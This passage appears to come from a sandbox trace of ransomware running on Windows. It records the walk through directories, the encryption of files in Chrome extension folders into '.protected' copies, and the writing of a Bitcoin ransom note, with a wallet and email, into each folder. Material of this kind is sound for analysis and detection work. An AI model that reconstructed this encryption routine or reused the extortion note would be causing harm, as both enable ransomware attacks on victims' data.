pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json.protected") returned 168 [0080.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json.protected")) returned 1 [0080.752] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.752] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.752] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\RESTORE_FILES.txt") returned 162 [0080.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.752] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.752] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.753] lstrlenA (lpString="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") returned 684 [0080.753] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, 
lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.753] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.753] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.753] CloseHandle (hObject=0x164) returned 1 [0080.753] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.753] lstrcmpiW (lpString1="zh_HK", lpString2="Windows") returned 1 [0080.753] lstrcmpiW (lpString1="zh_HK", lpString2="Program Files") returned 1 [0080.753] lstrcmpiW (lpString1="zh_HK", lpString2="Program Files (x86)") returned 1 [0080.753] lstrcmpiW (lpString1="zh_HK", lpString2="$Recycle.bin") returned 1 [0080.753] lstrcmpiW (lpString1="zh_HK", lpString2="System Volume Information") returned 1 [0080.753] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK") returned 144 [0080.753] lstrcmpW (lpString1="zh_HK", lpString2=".") returned 1 [0080.754] lstrcmpW (lpString1="zh_HK", lpString2="..") returned 1 [0080.754] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\*") returned 146 [0080.754] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.754] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.754] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.754] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.754] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.754] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.754] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\.") returned 146 [0080.754] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.754] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.754] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.754] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.754] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.754] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.754] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.754] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\..") returned 147 [0080.754] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.754] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.754] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.754] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned 
-1 [0080.754] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.754] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.754] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.754] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.754] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json") returned 158 [0080.754] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.754] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.754] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.754] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json") returned 158 [0080.755] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 
[0080.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json") returned 158 [0080.755] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json") returned 158 [0080.755] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.755] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0080.756] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.756] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0080.756] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.756] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.756] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.756] CloseHandle (hObject=0x168) returned 1 [0080.756] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json.protected") returned 168 [0080.756] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json.protected")) returned 1 [0080.757] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.757] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.757] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\RESTORE_FILES.txt") returned 162 [0080.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.757] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.757] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.758] lstrlenA (lpString="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") returned 684 [0080.758] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.758] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.758] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.758] CloseHandle (hObject=0x164) returned 1 [0080.758] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.758] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0080.758] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0080.759] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0080.759] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0080.759] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0080.759] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW") returned 144 [0080.759] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0080.759] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0080.759] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\*") returned 146 [0080.759] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.759] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.759] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.760] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.760] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.760] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.760] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\.") returned 146 [0080.760] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.760] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.760] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.760] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.760] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.760] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.760] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.760] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\..") returned 147 [0080.760] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.760] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.760] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.760] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned 
-1 [0080.760] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.760] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.760] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.760] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.760] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json") returned 158 [0080.760] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.760] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.760] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.760] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.760] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json") returned 158 [0080.760] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 
[0080.761] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json") returned 158 [0080.761] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.761] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json") returned 158 [0080.761] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.761] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xaa, lpOverlapped=0x0) returned 1 [0080.761] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.761] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xaa, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xaa, lpOverlapped=0x0) returned 1 [0080.761] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.762] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.762] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.762] CloseHandle (hObject=0x168) returned 1 [0080.762] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json.protected") returned 168 [0080.762] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0080.762] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.762] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.762] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 162 [0080.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
